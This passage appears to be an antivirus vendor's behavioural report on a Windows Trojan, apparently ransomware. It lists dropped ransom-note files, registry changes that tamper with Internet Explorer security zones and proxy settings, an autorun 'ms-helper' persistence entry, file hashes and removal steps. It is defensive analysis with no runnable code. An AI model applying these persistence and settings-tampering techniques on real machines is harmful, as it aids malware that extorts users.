%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\8\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\45\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\21\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\My Playlists\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Templates\restore_files_fyiyk.txt (2 bytes)
C:\totalcmd\SIZE!.TXT (1606 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\SendTo\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\52\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Cookies\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\30\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\30\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Templates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Templates\restore_files_fyiyk.txt (2 bytes)
C:\RECYCLER\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\36\restore_files_fyiyk.txt (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ip[1].htm (0 bytes)

Registry activity

The process bhtydrhbtr.exe:1252 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D C9 43 F6 6E 3E 8D D3 88 A3 45 55 A6 F7 81 69"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM]
"dl7SNqcf2wq431y4663"

The process %original file name%.exe:396 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1440840138"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 FC 4B E5 5C 79 D5 8D CE 16 5A B9 8A 79 6F 3D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process vssadmin.exe:1244 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 2D E7 3A C0 E9 08 A4 24 3B 49 3D 50 4A BA A0"

The process vcwuwa.exe:1980 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"VSSADMIN.EXE" = "Command Line Interface for Microsoft® Volume Shadow Copy Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\4417BF4A15FC3273]
"data" = "31 38 38 45 50 70 77 46 6B 64 51 76 43 64 67 78"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 65 6B B3 F1 EC D2 6E 3F 89 DD 30 A3 4D E1 1B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"

[HKCU\Software\msys]
"ID" = "44 17 BF 4A 15 FC 32 73"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLinkedConnections" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ms-helper" = "%Documents and Settings%\%current user%\Application Data\vcwuwa.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ms-helper" = "C"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM]
"dl7SNqcf2wq431y4663"

The process bryehretgw.exe:1160 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process bryehretgw.exe:1900 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 05 6A 2B 9A 59 BC BC 92 FF 2A 8E 13 75 10 BE"

Dropped PE files

MD5 File path
057b640c7a79a7b5d41d81f5a40595ffc:\Documents and Settings\"%CurrentUserName%"\Application Data\vcwuwa.exe
914e07e0ff8cd513d04a046f9a095682c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bryehretgw.exe
914e07e0ff8cd513d04a046f9a095682c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].htm
057b640c7a79a7b5d41d81f5a40595ffc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1[1].htm

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    bhtydrhbtr.exe:1252
    %original file name%.exe:396
    vssadmin.exe:1244
    bryehretgw.exe:1160

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\vcwuwa.exe (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bgdfcffc.exe (0 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bhtyhtvfse.exe (0 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\vgregwr.exe (0 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1[1].htm (649720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].htm (129192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bryehretgw.exe (129490 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bhtydrhbtr.exe (650032 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bttrbyerfd.exe (0 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\dwtetevf.exe (0 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\18\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\30\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\43\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\39\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Music\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\45\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\52\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\restore_files_fyiyk.html (5 bytes)
    C:\totalcmd\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\55\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\26\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602\restore_files_fyiyk.html (5 bytes)
    C:\totalcmd\LANGUAGE\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\10\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\16\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\26\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\16\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\18\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\58\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\PrintHood\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\E7VJ4HGS\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\GHISLER\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\4XCFALMJ\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\49\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\21\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\NetHood\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\MMC\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\22\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\42\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Identities\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\62\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\1\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\jre1.6.0_18\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\11\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\muffin\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\61\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\27\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\35\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\13\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\PrintHood\restore_files_fyiyk.txt (2 bytes)
    C:\totalcmd\NO.BAR (892 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\59\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\YJM90VAL\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\11\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Templates\quattro.wb2 (430 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\54\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Wireshark\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Recent\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\10\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\37\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\63\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\55\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Protect\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\52\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\9.0\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\31\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\My Documents\My Pictures\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\45\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.html (5 bytes)
